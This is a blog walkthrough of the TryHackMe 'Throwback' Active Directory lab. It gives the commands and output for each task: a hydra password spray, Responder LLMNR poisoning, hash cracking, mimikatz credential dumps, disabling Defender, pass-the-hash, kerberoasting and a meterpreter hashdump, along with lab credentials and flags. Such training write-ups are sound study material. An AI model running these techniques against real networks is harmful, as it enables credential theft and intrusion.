Throwback - [THM]

Cover Image for Throwback - [THM]
Marmeus
Marmeus

Introduction

In this post I show the commands, links or files you need to use in order to gather the information required to answer all the questions in the Throwback lab.

Note: The flags change dynamically so do not bother copying and pasting my flags.

Throwback Network

Task 7 - Entering the Breach

kali@kali:~/Documents/THM/Throwback$ nmap -sV -sC -p- -v --min-rate 1000 -oN NetworkScan.txt 10.200.179.0/24  
Nmap scan report for 10.200.179.138
Host is up (0.046s latency).
Not shown: 65531 filtered ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.5 (protocol 2.0)
| ssh-hostkey:
|_  4096 38:04:a0:a1:d0:e6:ab:d9:7d:c0:da:f3:66:bf:77:15 (RSA)
53/tcp  open  domain   (generic dns response: REFUSED)
80/tcp  open  http     nginx
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to https://10.200.179.138/
443/tcp open  ssl/http nginx
| http-methods:
|_  Supported Methods: GET HEAD POST
|_http-title: pfSense - Login
| ssl-cert: Subject: commonName=pfSense-5f099cf870c18/organizationName=pfSense webConfigurator Self-Signed Certificate
| Subject Alternative Name: DNS:pfSense-5f099cf870c18
| Issuer: commonName=pfSense-5f099cf870c18/organizationName=pfSense webConfigurator Self-Signed Certificate
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-07-11T11:05:28
| Not valid after:  2021-08-13T11:05:28
| MD5:   fe06 fa47 4d83 8454 e67a 1840 7ea8 d101
|_SHA-1: 672e 5f8f 9b28 7cad 5789 c5be cb1c f3f2 6c63 dfb2
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.91%I=7%D=12/29%Time=61CC761E%P=x86_64-pc-linux-gnu%r(DNS
SF:VersionBindReqTCP,E,"\0\x0c\0\x06\x81\x05\0\0\0\0\0\0\0\0");

Nmap scan report for 10.200.179.219
Host is up (0.046s latency).
Not shown: 65524 filtered ports
PORT      STATE SERVICE       VERSION
22/tcp    open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
|   2048 85:b8:1f:80:46:3d:91:0f:8c:f2:f2:3f:5c:87:67:72 (RSA)
|   256 5c:0d:46:e9:42:d4:4d:a0:36:d6:19:e5:f3:ce:49:06 (ECDSA)
|_  256 e2:2a:cb:39:85:0f:73:06:a9:23:9d:bf:be:f7:50:0c (ED25519)
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Throwback Hacks
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: THROWBACK
|   NetBIOS_Domain_Name: THROWBACK
|   NetBIOS_Computer_Name: THROWBACK-PROD
|   DNS_Domain_Name: THROWBACK.local
|   DNS_Computer_Name: THROWBACK-PROD.THROWBACK.local
|   DNS_Tree_Name: THROWBACK.local
|   Product_Version: 10.0.17763
|_  System_Time: 2021-12-29T14:53:02+00:00
| ssl-cert: Subject: commonName=THROWBACK-PROD.THROWBACK.local
| Issuer: commonName=THROWBACK-PROD.THROWBACK.local
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-12-27T01:03:16
| Not valid after:  2022-06-28T01:03:16
| MD5:   f469 5c2b e0d2 e866 9f43 e7f1 f342 453e
|_SHA-1: 6924 2ba7 f824 740f 9998 023d 91c4 563e 4e72 5622
|_ssl-date: 2021-12-29T14:54:30+00:00; 0s from scanner time.
5357/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-12-29T14:53:01
|_  start_date: N/A

Nmap scan report for 10.200.179.232
Host is up (0.048s latency).
Not shown: 65531 closed ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 4e:ef:ef:e7:60:94:87:99:d7:e1:ac:31:a1:04:04:36 (RSA)
|   256 ac:cc:f1:cd:d4:03:cb:63:2c:56:80:30:66:26:ad:77 (ECDSA)
|_  256 f4:dc:9d:b9:54:4a:e5:72:b9:40:19:f1:c5:75:ac:9b (ED25519)
80/tcp  open  http     Apache httpd 2.4.29 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 2D267521ED544C817FADA219E66C0CCC
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Throwback Hacks - Login
|_Requested resource was src/login.php
143/tcp open  imap     Dovecot imapd (Ubuntu)
|_imap-capabilities: OK have IDLE post-login LOGIN-REFERRALS LOGINDISABLEDA0001 more capabilities ENABLE IMAP4rev1 listed ID SASL-IR LITERAL+ Pre-login STARTTLS
| ssl-cert: Subject: commonName=ip-10-40-119-232.eu-west-1.compute.internal
| Subject Alternative Name: DNS:ip-10-40-119-232.eu-west-1.compute.internal
| Issuer: commonName=ip-10-40-119-232.eu-west-1.compute.internal
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-07-25T15:51:57
| Not valid after:  2030-07-23T15:51:57
| MD5:   adc4 c6e2 d74f d9eb ccde 96aa 5780 bb69
|_SHA-1: 93aa 5da0 3829 8ca3 aa6b f148 4f92 1ed0 c568 a942
|_ssl-date: TLS randomness does not represent time
993/tcp open  ssl/imap Dovecot imapd (Ubuntu)
|_imap-capabilities: listed IDLE have LOGIN-REFERRALS post-login more capabilities ENABLE SASL-IR AUTH=PLAINA0001 ID OK IMAP4rev1 Pre-login LITERAL+
| ssl-cert: Subject: commonName=ip-10-40-119-232.eu-west-1.compute.internal
| Subject Alternative Name: DNS:ip-10-40-119-232.eu-west-1.compute.internal
| Issuer: commonName=ip-10-40-119-232.eu-west-1.compute.internal
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-07-25T15:51:57
| Not valid after:  2030-07-23T15:51:57
| MD5:   adc4 c6e2 d74f d9eb ccde 96aa 5780 bb69
|_SHA-1: 93aa 5da0 3829 8ca3 aa6b f148 4f92 1ed0 c568 a942
|_ssl-date: TLS randomness does not represent time
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap scan report for 10.200.179.250
Host is up (0.046s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 bb:e5:c5:44:5c:ca:12:47:80:fc:35:6a:a8:30:12:e4 (RSA)
|   256 b5:cc:d4:cd:0e:57:56:49:95:e5:fc:fc:17:74:0c:68 (ECDSA)
|_  256 17:c6:0a:3d:e3:98:21:63:bf:2c:a4:f5:db:c1:00:53 (ED25519)
1337/tcp open  http    Node.js Express framework
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Error
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  • 10.200.XXX.138 -> Firewall (PFsense)
  • 10.200.XXX.219 -> Windows IIS
  • 10.200.XXX.232 -> Linux MAIL

What is the domain name?

THROWBACK.local

What is the HTTP title of the web server running on THROWBACK-PROD?

Throwback Hacks

How many ports are open on THROWBACK-MAIL?

4

What service is running on THROWBACK-FW01?

pfSense

What version of Apache is running on THROWBACK-MAIL?

Apache/2.4.29

Task 8 - Exploring the Caverns

Who is the CEO of Throwback Hacks?

http://10.200.XXX.219/#team -> Summers Winters

Where is the company located?

http://10.200.XXX.219/#contact -> Great Britain

What is the guest username on the mail server?

http://10.200.XXX.232/src/login.php -> tbhguest

What is the guest password on the mail server?

http://10.200.XXX.232/src/login.php -> WelcomeTBH1!

What flag is found within the guest inbox?

TBH{ede543c628d365ab772078b0f6880677}

What flag is found in the guest contacts page?

TBH{4060a70860f0a1648e5a991de1739888}

Task 9 - Web Shells and You!

Source: Link

What username was used to access the configuration portal?

admin

What password was used to access the configuration portal?

pfsense

What menu tab contains a command prompt tab in the PFSense Configuration panel?

Diagnostics/Command Promtp

Task - 10 First Contact

What log file was found that is not a default log?

cat /var/log/login.log 
Last Login 8/9/2020 15:51 -- HumphreyW:1c13639dba96c7b53d26f7d00956a364

What user was found within the log?

HumphreyW

What is the hash of the user?

1c13639dba96c7b53d26f7d00956a364 -> securitycenter

What is the root flag on THROWBACK-FW01?

TBH{4060a70860f0a1648e5a991de1739888}

cat /root/root.txt
TBH{b6f17a9c06e75ea4a09b79e8d89f9749}

What is the log flag on THROWBACK-FW01?

/var/log/flag.txt
TBH{c9cf8b688a9b8677a4546781527e4484}

Task 11 - Wait, just you mean just one this time?

POST /src/redirect.php HTTP/1.1
Host: 10.200.179.232
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 89
Origin: http://10.200.179.232
Connection: close
Referer: http://10.200.179.232/src/login.php
Cookie: SQMSESSID=on1cj6suhl1ebvv8ha7pq0mm41
Upgrade-Insecure-Requests: 1


login_username=tbhguest&secretkey=WelcomeTBH1%21&js_autodetect_results=1&just_logged_in=1

Command:

kali@kali:~/Documents/THM/Throwback$ cat users.txt 
tbhguest
HumphreyW
SummersW
FoxxR
noreply
DaibaN
PeanutbutterM
PetersJ
DaviesJ
BlaireJ
GongoH
MurphyF
JeffersD
HorsemanB

kali@kali:~/Documents/THM/Throwback$ cat weakPasswords.txt 
WelcomeTBH1!
securitycenter
Summer2020
Fall2020
Winter2020
Autumn2020
Summer2019
Fall2019
Winter2019
Autumn2019
Summer2018
Fall2018
Winter2018
Autumn2018
Management2020
Management2019
Management2018
Password2020
Password2019
Password2018
TBHSecurity2020
TBHSecurity2018
TBHSecurity2019
Throwback2020
Throwback2019
Throwback2018
Password123

kali@kali:~/Documents/THM/Throwback$ hydra -L users.txt -P weakPasswords.txt 10.200.179.232 http-post-form '/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:F=incorrect' 
[80][http-post-form] host: 10.200.179.232   login: tbhguest   password: WelcomeTBH1!
[80][http-post-form] host: 10.200.179.232   login: HumphreyW   password: securitycenter
[STATUS] 89.00 tries/min, 89 tries in 00:01h, 191 to do in 00:03h, 16 active
[80][http-post-form] host: 10.200.179.232   login: PeanutbutterM   password: Summer2020
[80][http-post-form] host: 10.200.179.232   login: DaviesJ   password: Management2018
[STATUS] 64.67 tries/min, 194 tries in 00:03h, 86 to do in 00:02h, 16 active
[80][http-post-form] host: 10.200.179.232   login: GongoH   password: Summer2020
[80][http-post-form] host: 10.200.179.232   login: MurphyF   password: Summer2020
[80][http-post-form] host: 10.200.179.232   login: JeffersD   password: Summer2020

What is the username parameter in the POST request?

login_username

What is the password parameter in the POST request?

secretkey

What username found with hydra starts with an M?

MurphyF

What is the password found with hydra?

Summer2020

Task 12 - Gone Phishing

msf6 exploit(multi/handler) > sessions 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: THROWBACK-WS01\BlaireJ

meterpreter > sysinfo
Computer        : THROWBACK-WS01
OS              : Windows 10 (10.0 Build 19041).
Architecture    : x64
System Language : en_US
Domain          : THROWBACK
Logged On Users : 10
Meterpreter     : x86/windows

What User was compromised via Phishing?

BlaireJ

What Machine was compromised during Phishing?

THROWBACK-WS01

What is the root flag on THROWBACK-WS01?

meterpreter > cat C:\\Users\\BlaireJ\\Desktop\\root.txt
TBH{9c5e361a2368723e042924180be7c958}

What is the user flag on THROWBACK-WS01?

meterpreter > cat C:\\Users\\humphreyw\\Desktop\\user.txt
TBH{813e2c2709ceb02041891acaec55121d}

Task 13 - Just a Drop Will Do

kali@kali:~/Documents/THM/Throwback$ sudo responder -I tun0 -rdw -v  

[SMB] NTLMv2-SSP Client   : 10.200.179.219
[SMB] NTLMv2-SSP Username : THROWBACK\PetersJ
[SMB] NTLMv2-SSP Hash     : PetersJ::THROWBACK:2f71c71c129872db:C2C361B7F2729FF632B3E0174EAA9CA8:010100000000000000647150A9FCD70162AD743085ED01C400000000020008004B004A004200340001001E00570049004E002D005800460046004300390045004500490059005700430004003400570049004E002D00580046004600430039004500450049005900570043002E004B004A00420034002E004C004F00430041004C00030014004B004A00420034002E004C004F00430041004C00050014004B004A00420034002E004C004F00430041004C000700080000647150A9FCD70106000400020000000800300030000000000000000000000000200000D52796F7101C20005C176D4C56B192B5A86AB2ACD74DABA441F4CF6F2F556D7A0A001000000000000000000000000000000000000900220063006900660073002F00310030002E00350030002E003100370036002E00340035000000000000000000
[SMB] NTLMv2-SSP Client   : 10.200.179.219
[SMB] NTLMv2-SSP Username : THROWBACK\PetersJ
[SMB] NTLMv2-SSP Hash     : PetersJ::THROWBACK:d18b1b179c6b5da6:8E585648F1086DB4DD79D6B4CA92388A:010100000000000000647150A9FCD701B4D13C91B3AFE5B500000000020008004B004A004200340001001E00570049004E002D005800460046004300390045004500490059005700430004003400570049004E002D00580046004600430039004500450049005900570043002E004B004A00420034002E004C004F00430041004C00030014004B004A00420034002E004C004F00430041004C00050014004B004A00420034002E004C004F00430041004C000700080000647150A9FCD70106000400020000000800300030000000000000000000000000200000D52796F7101C20005C176D4C56B192B5A86AB2ACD74DABA441F4CF6F2F556D7A0A001000000000000000000000000000000000000900220063006900660073002F00310030002E00350030002E003100370036002E00340035000000000000000000

What User fell victim to LLMNR Poisoning?

PetersJ

What is the 4th octet of the IP Address the LLMNR request came from?

219

What is the hostname of the device?

THROWBACK-PROD

Task 14 - We Will, We Will, Rockyou

What is the cracked password from the pfSense hash?

kali@kali:~/Documents/THM/Throwback$ john -w=/usr/share/wordlists/rockyou.txt --format=NT pfsense_hash.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (NT [MD4 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
securitycenter   (?)
1g 0:00:00:00 DONE (2021-12-29 11:57) 1.351g/s 1078Kp/s 1078Kc/s 1078KC/s seesaw22..sebial
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed

What is the cracked password from LLMNR poisoning?

kali@kali:~/Documents/THM/Throwback$ hashcat -m 5600 -r /opt/OneRuleToRuleThemAll.rule  responder_hashes.txt /usr/share/wordlists/rockyou.txt 
PETERSJ::THROWBACK:d18b1b179c6b5da6:8e585648f1086db4dd79d6b4ca92388a:010100000000000000647150a9fcd701b4d13c91b3afe5b500000000020008004b004a004200340001001e00570049004e002d005800460046004300390045004500490059005700430004003400570049004e002d00580046004600430039004500450049005900570043002e004b004a00420034002e004c004f00430041004c00030014004b004a00420034002e004c004f00430041004c00050014004b004a00420034002e004c004f00430041004c000700080000647150a9fcd70106000400020000000800300030000000000000000000000000200000d52796f7101c20005c176d4c56b192b5a86ab2acd74daba441f4cf6f2f556d7a0a001000000000000000000000000000000000000900220063006900660073002f00310030002e00350030002e003100370036002e00340035000000000000000000:Throwback317

Task 18 - SEATBELT CHECK!

====== CredEnum ======
  Target              : localadmin.pass
  UserName            : admin-petersj
  Password            : 
  CredentialType      : DomainPassword
  PersistenceType     : Enterprise
  LastWriteTime       : 8/25/2020 2:52:57 AM

What user was found from seatbelt?

admin-petersj

Submit flag for THROWBACK-PROD in Task 4

Executing the following command through an RDP session we can obtain all the flags in the machine.

C:\Users\petersj\Documents>runas /savecred /user:admin-petersj /profile "cmd.exe"

What is the flag from the poisoned user on THROWBACK-PROD?

C:\User>type C:\\Users\\petersj\\Desktop\\user.txt
TBH{277c5929d176569338ce0cff02f328c0}

What is the second user flag on THROWBACK-PROD?

C:\User>type C:\\Users\\blaitej.THROWBACK\\Desktop\\user.txt
TBH{9b56df4dc5cbda864a246ebfe4964d6c}

What is the root flag on THROWBACK-PROD?

PS C:\Users> type C:\Users\Administrator\Desktop\root.txt
TBH{4d6945c0b80283b875fc7c3a5a057da6}

Task 20 - Not the soft and fluffy kind

runas /savecred /user:admin-petersj /profile "C:\\Users\\petersj\\Documents\\launcher.bat"

powershell/credentials/mimikatz/command
privilege::debug sekurlsa::logonpasswords
Authentication Id : 0 ; 182634 (00000000:0002c96a)
Session           : Batch from 0
User Name         : BlaireJ
Domain            : THROWBACK
Logon Server      : THROWBACK-DC01
Logon Time        : 12/29/2021 8:50:13 PM
SID               : S-1-5-21-3906589501-690843102-3982269896-1116
	msv :	
	 [00000003] Primary
	 * Username : BlaireJ
	 * Domain   : THROWBACK
	 * NTLM     : c374ecb7c2ccac1df3a82bce4f80bb5b
	 * SHA1     : 6522277853426f24275c4c0b0381458ef452e640
	 * DPAPI    : db241bce607cacb4b04d032e25071f0f
	tspkg :	
	wdigest :	
	 * Username : BlaireJ
	 * Domain   : THROWBACK
	 * Password : (null)
	kerberos :	
	 * Username : BlaireJ
	 * Domain   : THROWBACK.LOCAL
	 * Password : 7eQgx6YzxgG3vC45t5k9
	ssp :	
	credman :	
	
Authentication Id : 0 ; 77225 (00000000:00012da9)
Session           : Batch from 0
User Name         : Administrator
Domain            : THROWBACK-PROD
Logon Server      : THROWBACK-PROD
Logon Time        : 12/29/2021 8:50:00 PM
SID               : S-1-5-21-1142397155-17714838-1651365392-500
	msv :	
	 [00000003] Primary
	 * Username : Administrator
	 * Domain   : THROWBACK-PROD
	 * NTLM     : a06e58d15a2585235d18598788b8147a
	 * SHA1     : 4e40938facb10fb6aa244240301b791a0454f328
	tspkg :	
	wdigest :	
	 * Username : Administrator
	 * Domain   : THROWBACK-PROD
	 * Password : (null)
	kerberos :	
	 * Username : Administrator
	 * Domain   : THROWBACK-PROD
	 * Password : (null)	

What domain user was logged in?

BlaireJ

What is the user's hash?

c374ecb7c2ccac1df3a82bce4f80bb5b

What is the administrator's NTLM hash?

a06e58d15a2585235d18598788b8147a

Task 22 - Good Intentions, Courtesy of Microsoft

┌──(root@kali)-[/media/sf_2_MisPostsBlog/THM/Throwback]
└─# proxychains crackmapexec smb 10.200.179.0/24 -u BlaireJ -d THROWBACK -H c374ecb7c2ccac1df3a82bce4f80bb5b 2>1 | grep \+
SMB         10.200.179.219  445    THROWBACK-PROD   [+] THROWBACK\BlaireJ c374ecb7c2ccac1df3a82bce4f80bb5b (Pwn3d!)
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.200.179.222:445 <--socket error or timeout!
 ...  OK                                                                                                                                                      
SMB         10.200.179.222  445    THROWBACK-WS01   [+] THROWBACK\BlaireJ c374ecb7c2ccac1df3a82bce4f80bb5b 
SMB         10.200.179.117  445    THROWBACK-DC01   [+] THROWBACK\BlaireJ c374ecb7c2ccac1df3a82bce4f80bb5b 
SMB         10.200.179.219  445    THROWBACK-PROD   [+] THROWBACK\BlaireJ c374ecb7c2ccac1df3a82bce4f80bb5b (Pwn3d!)
SMB         10.200.179.222  445    THROWBACK-WS01   [+] THROWBACK\BlaireJ c374ecb7c2ccac1df3a82bce4f80bb5b   

kali@kali:/media/sf_2_MisPostsBlog/THM/Throwback$ proxychains crackmapexec smb 10.200.179.0/24 -u HumphreyW -d THROWBACK -H 1c13639dba96c7b53d26f7d00956a364  2>1 | grep \+
SMB         10.200.179.117  445    THROWBACK-DC01   [+] THROWBACK\HumphreyW 1c13639dba96c7b53d26f7d00956a364 
SMB         10.200.179.176  445    THROWBACK-TIME   [+] THROWBACK\HumphreyW 1c13639dba96c7b53d26f7d00956a364 
SMB         10.200.179.222  445    THROWBACK-WS01   [+] THROWBACK\HumphreyW 1c13639dba96c7b53d26f7d00956a364 
SMB         10.200.179.219  445    THROWBACK-PROD   [+] THROWBACK\HumphreyW 1c13639dba96c7b53d26f7d00956a364

Task 23 - Wallace and Gromit

We need to disable the windows firewall in order to upload SharpHound.ps1 and we can do it because we are member of the Administrators group.

kali@kali:/media/sf_2_MisPostsBlog/THM/Throwback$ sudo proxychains ssh "blairej"@10.200.179.222
throwback/blairej@10.200.179.222's password: 7eQgx6YzxgG3vC45t5k9

blairej@THROWBACK-WS01 C:\Users\BlaireJ> net user BlaireJ  
[...]                  
Local Group Memberships      *Administrators         
Global Group memberships     *None 
blairej@THROWBACK-WS01 C:\Users\BlaireJ>powershell -c "Set-MpPreference -DisableRealTimeMonitoring $true"

blairej@THROWBACK-WS01 C:\Users\BlaireJ>
PS C:\Users\BlaireJ> Invoke-Bloodhound -CollectionMethod All -Domain Throwback -ZipFileName loot.zip                 
------------------------------------------------
Initializing SharpHound at 3:26 PM on 12/29/2021
------------------------------------------------

Resolved Collection Methods: Group, Sessions, LoggedOn, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container

[+] Cache File not Found: 0 Objects in cache

[+] Pre-populating Domain Controller SIDS
Status: 0 objects finished (+0) -- Using 84 MB RAM
Status: 151 objects finished (+151 15.1)/s -- Using 97 MB RAM
Enumeration finished in 00:00:10.5925838
Compressing data to C:\Users\BlaireJ\20211229152617_loot.zip
You can upload this file directly to the UI

SharpHound Enumeration Completed at 3:28 PM on 12/29/2021! Happy Graphing!

PS C:\Users\BlaireJ> dir


    Directory: C:\Users\BlaireJ


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-r---         6/28/2020   3:31 PM                3D Objects
d-r---         6/28/2020   3:31 PM                Contacts
d-r---         8/25/2020   3:43 PM                Desktop
d-r---         6/28/2020   3:31 PM                Documents
d-r---         7/27/2020   8:39 AM                Downloads
d-r---         6/28/2020   3:31 PM                Favorites
d-r---         6/28/2020   3:31 PM                Links
d-r---         6/28/2020   3:31 PM                Music
d-r---          8/9/2020  10:25 AM                OneDrive
d-r---         6/28/2020   3:33 PM                Pictures
d-r---         6/28/2020   3:31 PM                Saved Games
d-r---         6/28/2020   3:33 PM                Searches
d-r---         7/14/2020  11:47 AM                Videos
-a----        12/29/2021   3:28 PM          15330 20211229152617_loot.zip

kali@kali:/media/sf_2_MisPostsBlog/THM/Throwback$ sudo proxychains scp "blairej"@10.200.179.222:20211229152617_loot.zip .
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.14
[proxychains] DLL init: proxychains-ng 4.14
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.200.179.222:22  ...  OK
blairej@10.200.179.222's password: 
20211229152617_loot.zip 

What service account is kerberoastable?

On bloodhound use "List all Kerberoastable Accounts".

SQLSERVICE

What domain does the trust connect to?

On bloodhound use "Map Domain Trusts".

corporate.local

What normal user account is a domain admin?

On bloodhound use "Find all Domain Admins".

Mercerh

Task 24 - With three heads you'd think they'd at least agree once

┌──(root@kali)-[/media/sf_2_MisPostsBlog/THM/Throwback]
└─# proxychains GetUserSPNs.py -dc-ip 10.200.179.117 "THROWBACK.local/blairej:7eQgx6YzxgG3vC45t5k9" -request
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.14
Impacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation

[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.200.179.117:389  ...  OK
ServicePrincipalName                         Name        MemberOf  PasswordLastSet             LastLogon                   Delegation 
-------------------------------------------  ----------  --------  --------------------------  --------------------------  ----------
TB-ADMIN-DC/SQLService.THROWBACK.local:6792  SQLService            2020-07-27 11:20:08.552650  2020-07-27 11:26:43.628665             



[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.200.179.117:88  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.200.179.117:88  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.200.179.117:88  ...  OK
$krb5tgs$23$*SQLService$THROWBACK.LOCAL$THROWBACK.local/SQLService*$ebd1055f628adf4dda15bbc00ae27ea7$9be036853c410815f6847010c2532647b54ccf068a373126d000ace628541636d5a43b68bf01330ec62c347e4388479f48f3fcbf1de179c919b5ebbac164a73c2fecb65ae1b3c66cd26326c2ccb18732523818303a0b43f6cd5c8fe8ea28c4db189839c53ac14c3165d7eaecff7f02944f7d8989b148ad8b0934347ca0bbd41235c37af189f8c4502743da94afce6f33f02c5720208e76fd0222102bb8f65aef404612a820f8ffbe8fe47467402d0b6094a1e9c1f445ff98f5a78d23f875cc387cbce7ea8a35faf41dcb53e5621d87d383e414a5b2b47174513ebed714a4d8471f4b9fc178b3e01eadef97458b41f027535f781b255fb4bab8e620678c7b77f4d9161419291d1d5134be3a5ef770cf127abf1b8bed616befe780db125f87bec6f939ab6b1c4e9a7eb993411298963931a8d07367470636210789c03380d6468db8192851e93467180a000546008a718451cc62054fd063433984ffb69d09c29ec98e39de51fd726cb95f7bf180d8d0e75b4d0e65870e77ad4786f036a15f244f8905aff18d49f55985801433b901360485d56f2d5f2acc4376f83ae7baf7f64386bd065cd4636206749e031fd77a15915bf81840e98953be1ebb414372d8c4d11458d517800aba73df7cd022de595cf64c5f70b5726666ad40eb33e18918dd9f81ad95ac42dd1d45be8fe266a70474d102acf58c612b0e10843bd29a6bea67e0d6efb18334213fa99f46420f0fcd928d94698656a856c533ee6a9e1cd5cf04acab381e75f91697d0c5239400054de59beda2aaf34fee5b286b037acf5a21bc824a66ee99015bfb4509308f6c2f4d517858eb29061828ddcaaa1221c6f533f65a28e19ad2c101812b0c9a2e4b36ea2646eb181ba623f2246ec5d567f6f7f91819976926817590e250d6b8c18af594d5037c348be7328e0f6dc6c36e68eb7f0251ef54d2205eb2132ab492478e73fa23a3cae958bbed76df88aa4fa108a8293d1037b68946d7d8a8df995c06a469496d00285d13239eed17692bef3d327a314ae4e766fe159576bbb6cbdf60ea7936d138d6b0bcce23755aa12b2f447bf32ee5397619a89e259d3e303045567c223f6657f9ddc6362b562dad8f0e671d24e24b1bd172cc3d6fc0fcad622f43835ecb9a3a315a65361a32addeaef5984c864b3280fc2687255c787b96d8cea66b844fb9240d04bdb5e0724d8c88e0e690f1fc3f6e69c3cd44d28f96e45da2d750da80e1e90779f8bdcc47a6d27b8df0fa20c1c7227fc1f5afc988ace86d537d1940162743b7367a3eb273be1ab148123090fe2fc475a6234487cedd9dbdafe9cbdf4894c1c5aae24449e42d8c6cb860fe686fedd34087fa3d9b4ab5075e3ab2c74211ab

Cracking the hash.

kali@kali:~/Documents/THM/Throwback$ hashcat -m 13100 -a 0 sqlservice_ticket.txt /usr/share/wordlists/rockyou.txt 
[...]:mysql337570

What account was compromised by kerberoasting?

SQLService

What password was cracked from the retrieved ticket?

mysql337570

Task 25 - You're Five Minutes Late...

echo "10.200.179.176 timekeep.throwback.local" | sudo tee -a /etc/hosts

What is the hostname of the device?

THROWBACK-TIME

What is the title of the web page?

Throwback Hacks Timekeep

What user was the password reset for?

murphyf

What is the password reset flag on THROWBACK-TIME?

kali@kali:~/Documents/THM/Throwback$ sudo proxychains curl "http://timekeep.throwback.local/dev/passwordreset.php?user=murphyf&password=PASSWORD"
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.14
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.200.179.176:80  ...  OK
Password successfully updated TBH{326e71e82d2cfc439ee513340b8d9222}

Task 26 - Word to your Mother

What web server accepts XLSMs as a file upload?

THROWBACK-TIME

what page is the file upload in?

timesheet.php

What is the name of the XLSMs that you can upload?

Timesheet.xlsm

Task 27 - Meterpreter session 1 closed. Reason: World-Domination

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:43d73c6a52e8626eabc5eb77148dca0b:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
sshd:1008:aad3b435b51404eeaad3b435b51404ee:6eea75cd2cc4ddf2967d5ee05792f9fb:::
Timekeeper:1009:aad3b435b51404eeaad3b435b51404ee:901682b1433fdf0b04ef42b13e343486:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:58f8e0214224aebc2c5f82fb7cb47ca1:::

kali@kali:~/Documents/THM/Throwback$ cat timekeeper_hash.txt 
901682b1433fdf0b04ef42b13e343486
kali@kali:~/Documents/THM/Throwback$ hashcat -m 1000 -a 0 timekeeper_hash.txt  /usr/share/wordlists/rockyou.txt 
901682b1433fdf0b04ef42b13e343486:keeperoftime  

Which user's hashes were we able to dump?

Timekeeper

What is the user's hash starting from the third colon?

901682b1433fdf0b04ef42b13e343486

What is the administrator's hash starting from the third colon?

43d73c6a52e8626eabc5eb77148dca0b
